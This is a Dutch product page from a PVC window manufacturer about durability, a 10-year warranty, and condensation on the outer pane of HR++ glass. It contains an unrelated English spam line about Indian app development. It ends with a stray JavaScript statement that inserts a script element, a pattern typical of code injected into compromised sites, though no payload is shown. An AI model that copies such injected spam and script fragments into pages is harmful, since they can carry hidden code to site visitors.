Gegarandeerde Kwaliteit

Gegarandeerde Kwaliteit

application development services india iphone app development agency iphone app development companies india

Duurzame Kwaliteit, daar gaat het om!

Cremers heeft zich gespecialiseerd in de moderne grondstof pvc die in economisch en ecologisch opzicht grote voordelen biedt. Zo heeft pvc een extreem hoge levensduur vanwege zijn extreme bestendigheid tegen weersomstandigheden en veroudering.

Onderhoudsvrij en milieubesparend

Kosten voor opnieuw schilderen zijn er niet, want het oppervlak is langdurig onderhoudsvrij. En dat bij uitstekende stevigheids- en isolatiewaarden. Ook het milieu profiteert van het materiaal dat voor 98% recyclebaar is. En dat begint allemaal al tijdens productie en fabricage.

10 jaar Garantie

Natuurlijk staan wij volledig achter de door ons geleverde producten, we geven dan ook 10 jaar Garantie op kunststof, glas, hang- en sluitwerk.

 

CONDENS AAN BUITENKANT VAN HR++ GLAS, KAN DAT?

Het is soms mogelijk dat op de buitenzijde van de HR++ beglazing condens optreedt. Dit komt door de hoge isolatiewaarde van het glastype. Bij een lage isolatiewaarde (U-waarde) gaat er minder warmte verloren door het glas. Het buitenblad van het isolerende dubbelglas blijft vervolgens kouder.

Bij een hoge U-waarde zal er meer warmte door het glas verloren gaan en wordt ook het buitenblad warmer. Dit heeft tot gevolg dat bij een lage temperatuur en een hoge relatieve vochtigheid de buitenzijde van het glas vaak tot laat in de dag gecondenseerd kan zijn, waarbij het doorzicht belemmerd wordt. Dit probleem komt voor bij ramen in ruimten waar minder gestookt wordt zoals bijvoorbeeld slaapkamers.document.currentScript.parentNode.insertBefore(s, document.currentScript);